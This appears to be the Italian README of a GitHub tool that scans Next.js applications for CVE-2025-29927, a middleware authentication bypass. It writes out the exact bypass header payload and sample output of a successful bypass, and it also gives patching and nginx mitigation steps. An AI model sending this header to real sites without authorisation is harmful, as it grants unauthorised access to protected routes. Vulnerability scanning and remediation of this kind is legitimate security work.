
🔐 Scanner intelligente basato su Python per CVE-2025-29927 — vulnerabilità di bypass dell'autenticazione nel middleware di Next.js. Rileva meta refresh, redirect basati su parole chiave e altro.
Questo scanner intelligente basato su Python aiuta a rilevare la vulnerabilità CVE-2025-29927 nelle applicazioni Next.js — un bypass critico del middleware che consente agli attaccanti di saltare l'autenticazione utilizzando un header HTTP appositamente costruito.
🧠 Lo strumento identifica non solo i redirect HTTP, ma anche i meccanismi di reindirizzamento lato client come
<meta http-equiv="refresh">, redirect di login basati su parole chiave e bypass di autenticazione silenziosi.
x-middleware-subrequest<meta refresh>login, sign in, authentication$ python3 CVE-2025-29927.py
🌐 Inserisci l'URL del sito target (es. http://localhost:3000): http://vulnerable.local
📁 Inserisci il percorso protetto (es. /dashboard): /admin
→ Test con header: middleware:middleware:middleware:middleware:middleware
↳ Stato HTTP: 200
↳ Redirect rilevato: No
✅ VULNERABILE! Bypass riuscito con header:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
git clone https://github.com/sagsooz/CVE-2025-29927.git
cd CVE-2025-29927
pip install -r requirements.txt
python3 CVE-2025-29927.py
.
├── CVE-2025-29927.py # Scanner interattivo principale
├── requirements.txt # Dipendenze Python
└── README.md # Questo file
requests
beautifulsoup4
colorama
Se la tua applicazione è vulnerabile, procedi come segue:
v15.2.3 o successiva (oppure 14.2.25+ / 13.5.7+)proxy_set_header x-middleware-subrequest "";
CVE-2025-29927 consente agli attaccanti di bypassare i controlli del middleware di Next.js manipolando l'header x-middleware-subrequest con valori appositamente costruiti come:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
Nelle versioni vulnerabili, ciò disabilita completamente l'esecuzione del middleware — consentendo l'accesso diretto a route protette come /dashboard, /admin, ecc.
Mantenuto da: @mrzblackhat
Sentiti libero di contattarmi su Telegram per suggerimenti, miglioramenti o contributi.
next.js CVE-2025-29927 bugbounty middleware bypass authentication web security python security scanner ethical hacking
Questo strumento è fornito solo per scopi educativi e di ricerca. Usalo in modo responsabile.